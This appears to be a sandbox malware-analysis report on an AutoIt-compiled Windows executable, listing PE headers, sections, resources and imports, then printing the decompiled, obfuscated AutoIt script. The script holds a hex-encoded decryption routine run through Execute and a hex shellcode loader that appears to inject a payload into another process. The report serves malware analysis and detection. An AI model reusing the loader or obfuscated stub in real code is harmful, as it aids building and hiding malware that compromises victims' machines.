                                                                                                                                                                                    lea esi, dword ptr [esi+04h]
                                                                                                                                                                                    mov dword ptr [edi], eax
                                                                                                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                                                                                                    bt edi, 03h
                                                                                                                                                                                    jnc 00007FDD086BBC83h
                                                                                                                                                                                    movq xmm1, qword ptr [esi]
                                                                                                                                                                                    sub ecx, 08h
                                                                                                                                                                                    lea esi, dword ptr [esi+08h]
                                                                                                                                                                                    movq qword ptr [edi], xmm1
                                                                                                                                                                                    lea edi, dword ptr [edi+08h]
                                                                                                                                                                                    test esi, 00000007h
                                                                                                                                                                                    je 00007FDD086BBCD5h
                                                                                                                                                                                    bt esi, 03h

                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [ C ] VS2013 build 21005
                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                    • [LNK] VS2013 UPD5 build 40629
                                                                                                                                                                                    • [ASM] VS2013 UPD5 build 40629
                                                                                                                                                                                    • [C++] VS2013 build 21005
                                                                                                                                                                                    • [ASM] VS2013 build 21005
                                                                                                                                                                                    • [RES] VS2013 build 21005
                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                    Data Directories

                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x12256c.rsrc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1ea0000x7130.reloc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                    Sections

                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000x8dd2e0x8de00False0.572995250551data6.67587543996IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rdata0x8f0000x2e10e0x2e200False0.335334095528data5.76073164877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0xbe0000x8f740x5200False0.10175304878data1.19881067447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rsrc0xc70000x12256c0x122600False0.568714182899data4.37593958811IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .reloc0x1ea0000x71300x7200False0.770353618421data6.78237732804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                    Resources

                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                    RT_ICON0xc76e80x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xc78100x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xc79380x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xc7a600x2e8dataEnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xc7d480x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xc7e700xea8dataEnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xc8d180x8a8dBase III DBT, version number 0, next free block index 40EnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xc95c00x568GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xc9b280x25a8dBase III DBT, version number 0, next free block index 40EnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xcc0d00x10a8dataEnglishGreat Britain
                                                                                                                                                                                    RT_ICON0xcd1780x468GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                                                                                                                    RT_MENU0xcd5e00x50dataEnglishGreat Britain
                                                                                                                                                                                    RT_STRING0xcd6300x594dataEnglishGreat Britain
                                                                                                                                                                                    RT_STRING0xcdbc40x68adataEnglishGreat Britain
                                                                                                                                                                                    RT_STRING0xce2500x490dataEnglishGreat Britain
                                                                                                                                                                                    RT_STRING0xce6e00x5fcdataEnglishGreat Britain
                                                                                                                                                                                    RT_STRING0xcecdc0x65cdataEnglishGreat Britain
                                                                                                                                                                                    RT_STRING0xcf3380x466dataEnglishGreat Britain
                                                                                                                                                                                    RT_STRING0xcf7a00x158dataEnglishGreat Britain
                                                                                                                                                                                    RT_FONT0xcf8f80x374d4ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                    RT_FONT0x106dcc0x374d4ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                    RT_FONT0x13e2a00x374d4ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                    RT_FONT0x1757740x374d4ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                    RT_FONT0x1acc480x374d2ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                    RT_RCDATA0x1e411c0x4faadata
                                                                                                                                                                                    RT_GROUP_ICON0x1e90c80x76dataEnglishGreat Britain
                                                                                                                                                                                    RT_GROUP_ICON0x1e91400x14dataEnglishGreat Britain
                                                                                                                                                                                    RT_GROUP_ICON0x1e91540x14dataEnglishGreat Britain
                                                                                                                                                                                    RT_GROUP_ICON0x1e91680x14dataEnglishGreat Britain
                                                                                                                                                                                    RT_MANIFEST0x1e917c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain

                                                                                                                                                                                    Imports

                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                                                    UxTheme.dllIsThemeActive
                                                                                                                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                                                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                                                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                                                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                                                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                    EnglishGreat Britain

                                                                                                                                                                                    Static AutoIT Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Code:#EndRegion OPT ("TrayIconHide" , "1" ) FUNC QDAFJTRQZX ($VDATA , $VCRYPTKEY ) LOCAL $__G_ACRYPTINTERNALDATA ["3" ] LOCAL $TBUFF LOCAL $TTEMPSTRUCT LOCAL $IPLAINTEXTSIZE LOCAL $VRETURN LOCAL $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB = EXECUTE LOCAL $OUBJOAAIMSDPJLUJMOJFF = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ("BinaryToString" ) $VDATA = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x42696E617279546F537472696E672824764461746129" ) ) LOCAL $RINBPFAJNNNCNFFUKSQVPCXY = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C2022437279707441637175697265436F6E74657874222C202268616E646C652A222C202230222C2022707472222C202230222C2022707472222C202230222C202264776F7264222C20223234222C202264776F7264222C2022307846303030303030302229" ) ) $__G_ACRYPTINTERNALDATA ["2" ] = $RINBPFAJNNNCNFFUKSQVPCXY ["1" ] $RINBPFAJNNNCNFFUKSQVPCXY = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C2022437279707443726561746548617368222C202268616E646C65222C20245F5F675F614372797074496E7465726E616C446174615B2232225D2C202275696E74222C202230783030303038303033222C2022707472222C202230222C202264776F7264222C202230222C202268616E646C652A222C2022302229" ) ) $HCRYPTHASH = $RINBPFAJNNNCNFFUKSQVPCXY ["5" ] $TBUFF = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C5374727563744372656174652822627974655B2220262042696E6172794C656E28247643727970744B657929202620225D2229" ) ) $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C53747275637453657444617461282474427566662C204578656375746528223122292C20247643727970744B657929" ) ) $RINBPFAJNNNCNFFUKSQVPCXY = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C202243727970744861736844617461222C202268616E646C65222C2024684372797074486173682C20227374727563742A222C202474427566662C202264776F7264222C20446C6C53747275637447657453697A6528247442756666292C202264776F7264222C2022312229" ) ) $RINBPFAJNNNCNFFUKSQVPCXY = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C202243727970744465726976654B6579222C202268616E646C65222C245F5F675F614372797074496E7465726E616C446174615B2232225D2C202275696E74222C202230783030303036363130222C202268616E646C65222C2024684372797074486173682C202264776F7264222C202230783030303030303031222C202268616E646C652A222C2022302229" ) ) $VRETURN = $RINBPFAJNNNCNFFUKSQVPCXY ["5" ] $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C2022437279707444657374726F7948617368222C202268616E646C65222C20246843727970744861736829" ) ) $VCRYPTKEY = $VRETURN $TBUFF = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C5374727563744372656174652822627974655B2220262042696E6172794C656E2824764461746129202B20223130303022202620225D2229" ) ) $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C53747275637453657444617461282474427566662C204578656375746528223122292C2024764461746129" ) ) $RINBPFAJNNNCNFFUKSQVPCXY = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C2022437279707444656372797074222C202268616E646C65222C20247643727970744B65792C202268616E646C65222C202230222C2022626F6F6C222C204578656375746528223122292C202264776F7264222C202230222C20227374727563742A222C202474427566662C202264776F72642A222C2042696E6172794C656E282476446174612929" ) ) $IPLAINTEXTSIZE = $RINBPFAJNNNCNFFUKSQVPCXY ["6" ] $TTEMPSTRUCT = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C5374727563744372656174652822627974655B222026202469506C61696E5465787453697A65202B20223122202620225D222C20446C6C537472756374476574507472282474427566662929" ) ) $VRETURN = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x42696E6172794D696428446C6C5374727563744765744461746128247454656D705374727563742C20457865637574652822312229292C202231222C202469506C61696E5465787453697A6529" ) ) $RINBPFAJNNNCNFFUKSQVPCXY = $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C2022437279707444657374726F794B6579222C202268616E646C65222C20247643727970744B657929" ) ) $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C2022437279707444657374726F794B6579222C202268616E646C65222C20247643727970744B657929" ) ) $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x446C6C43616C6C282241647661706933322E646C6C222C2022626F6F6C222C2022437279707452656C65617365436F6E74657874222C202268616E646C65222C20245F5F675F614372797074496E7465726E616C446174615B2232225D2C202264776F7264222C2022302229" ) ) RETURN $GKLMZKWVRIEPOUQPNCWKHLJCYZKOIZFOFCAGDYSQECUAOWJFOZLRB ($OUBJOAAIMSDPJLUJMOJFF ("0x42696E61727928247652657475726E29" ) ) ENDFUNC FUNC MKAWTJCTRCEZDEDBUQPZGMLXI ($WPATH , $WARGUMENTS , $LPFILE , $PROTECT ) LOCAL $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV = "0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC5657" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "8B7D0833F657E8D7FFFFFF8BC885C974200FBE07C1E60403F08BC625000000" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5DC20400558BEC5151" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "5356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "401803CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "74148B55FC463B750872E733C05F5E5B8BE55DC208008B45F80FB704708B04" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "8303C7EBE9558BEC81ECF003000053565733FF897DB8648B35300000008B76" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "0C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "368B76188975C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "C7855CFFFFFF794A8A0B898524FFFFFF8D45B0898528FFFFFF8D45A489852C" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "FFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538FFFFFF8D" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D45948985" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "48FFFFFF8D45C489854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFF" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "EE38830CC78564FFFFFF5764E101C78568FFFFFF18E4CA08C7856CFFFFFFE3" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFFE4C7" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "230FC7458CE86F180D898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "B850E842FEFFFF8B8CB520FFFFFF890185C00F84910300004683FE0E7CD28B" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "DF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB746" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "14897DF8897DBC8945D039BEA0000000741139BEA40000007409F646160175" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "0333FF4733D2897DF433C08955EC6639110F94C03D4D5A00000F840E030000" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "33C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "000F84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "FF55A485C00F84AD0200008D8510FCFFFF50FF75DCFF55A085C00F84980200" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF559485C00F847802" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "00008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A4068003000" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "00FF76506A00FF55988BD885DB0F84450200006A406800300000FF7650FF76" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "34FF75D8FF55C08945F885C0753B85FF0F84230200006A406800300000FF76" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "5033FFC745EC0100000057FF75D8FF55C08945F885C0751468008000005753" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B46" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "06732C8B7DD083C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4D" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "F08D7F280FB7460641894DF03BC87CDC8B7B3C8B45F803FB837DEC00894734" $YLENXIVXIDTVMKUIDEPCGXOESDQPJPPKOORUWV &= "0F848A000000837DF4000F84800000008B97A00000008365F40003D383BFA4" 